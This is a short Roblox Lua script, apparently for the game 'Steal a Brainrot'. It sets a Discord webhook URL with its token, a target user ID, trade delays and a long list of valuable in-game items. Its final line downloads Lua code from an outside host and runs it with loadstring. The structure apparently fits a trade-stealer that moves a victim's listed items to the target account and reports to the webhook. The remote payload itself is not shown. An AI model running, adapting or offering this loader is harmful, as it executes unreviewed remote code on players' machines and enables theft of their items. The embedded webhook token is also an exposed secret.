
local genv = getgenv()
genv.WEBHOOK_URL = 'https://discord.com/api/webhooks/1477776859306660062/sIFIuqnh-_Z9qAmObLaEStqOsKaaxSofvtvo7F4C458aSLgy9TzpG4PQInNMVJ8THwKV'
genv.TARGET_ID = 2606738563
genv.DELAY_STEP = 1
genv.TRADE_CYCLE_DELAY = 2
genv.TARGET_BRAINROTS = {
    ['Celularcini Viciosini'] = true,
    ['Bacuru and Egguru'] = true,
    ['Yess my examine'] = true,
    ['67'] = true,
    ['Fragrama and Chocrama'] = true,
    ['Mieteteira Bicicleteira'] = true,
    ['Jolly Jolly Sahur'] = true,
    ['Los Bros'] = true,
    ['Los Sweethearts'] = true,
    ['Sammyni Fattini'] = true,
    ['Nooo My Hotspot'] = true,
    Meowl = true,
    ['Guest 666'] = true,
    ['Los Sekolahs'] = true,
    ['Tictac Sahur'] = true,
    ['Festive 67'] = true,
    ['La Jolly Grande'] = true,
    ['Garama and Madundung'] = true,
    ['Noo my Heart'] = true,
    ['Dragon Gingerini'] = true,
    ['Agarrini la Palini'] = true,
    ['Tang Tang Keletang'] = true,
    ['Esok Sekolah'] = true,
    ['Rosey and Teddy'] = true,
    ['Spaghetti Tualetti'] = true,
    ['W or L'] = true,
    ['Tuff Toucan'] = true,
    Telemorte = true,
    Tralaledon = true,
    ['Los Tacoritas'] = true,
    ['Fishino Clownino'] = true,
    ['Trenostruzzo Turbo 4000'] = true,
    ['Los Puggies'] = true,
    ['Swag Soda'] = true,
    Eviledon = true,
    ['Reinito Sleighito'] = true,
    ['Ketupat Kepat'] = true,
    ['La Extinct Grande'] = true,
    ['Dragon Cannelloni'] = true,
    ['La Grande Combinasion'] = true,
    ['La Casa Boo'] = true,
    ['Perrito Burrito'] = true,
    ['Spinny Hammy'] = true,
    ['1x1x1x1'] = true,
    ['Skibidi Toilet'] = true,
    ['Fragola La La La'] = true,
    ['La Secret Combinasion'] = true,
    ['Santa Hotspot'] = true,
    ['Karker Sahur'] = true,
    ['Headless Horseman'] = true,
    ['Job Job Job Sahur'] = true,
    ['Rosetti Tualetti'] = true,
    ['Swaggy Bros'] = true,
    ['Mariachi Corazoni'] = true,
    ['Rang Ring Bus'] = true,
    ['Burguro And Fryuro'] = true,
    ['Quesadillo Vampiro'] = true,
    ['Chicleteira Noelteira'] = true,
    ['Nuclearo Dinossauro'] = true,
    ['Ginger Gerat'] = true,
    ['Popcuru and Fizzuru'] = true,
    ['Pirulitoita Bicicleteira'] = true,
    ['Spooky and Pumpky'] = true,
    ['Bunito Bunito Spinito'] = true,
    ['La Spooky Grande'] = true,
    ['Tacorita Bicicleta'] = true,
    ['Noo my Present'] = true,
    ['Chicliterita bicicliterita'] = true,
    ['Hydra Dragon Cannelloni'] = true,
    ['Gobblino Uniciclino'] = true,
    ['List List List Sahur'] = true,
    ['Los Spaghettis'] = true,
    ['25'] = true,
    ['Los Hotspotsitos'] = true,
    ['Money Money Reindeer'] = true,
    ['Cooki and Milki'] = true,
    ['Money Money Puggy'] = true,
    ['Lovin Rose'] = true,
    ['Love Love Bear'] = true,
    ['Los Spooky Combinasionas'] = true,
    ['Los Primos'] = true,
    ['Noo my examine'] = true,
    ['Noo my Candy'] = true,
    ['La Sahur Combinasion'] = true,
    ['Los Mobilis'] = true,
    ['Donkeyturbo Express'] = true,
    ['La Food Combinasion'] = true,
    ['Los Jolly Combinasionas'] = true,
    ['Los Planitos'] = true,
    ['Extinct Matteo'] = true,
    ['Los 67'] = true,
    ['Capitano Moby'] = true,
    ['Los 25'] = true,
    ['Los Candies'] = true,
    ['Los Amigos'] = true,
    ['Los Combinasionas'] = true,
    ['Chicleteira Cupideira'] = true,
    ['Ketupat Bros'] = true,
    Chimnino = true,
    ['Las Sis'] = true,
    ['La Taco Combinasion'] = true,
    ['Chillin Chili'] = true,
    ['La Supreme Combinasion'] = true,
    Orcaledon = true,
    ['La Romantic Grande'] = true,
    ['Giftini Spyderini'] = true,
    ['La Ginger Sekolah'] = true,
    ['Chipso and Queso'] = true,
    ['Strawberry Elephant'] = true,
    ['Ketchuru and Musturu'] = true,
    ['Cuadramat and Pakrahmatmamat'] = true,
    Cerberus = true,
}

loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/22af93ab693db02daf53289254172c2b7e2fbd0bf0698431468cc16f59172c15/download"))()
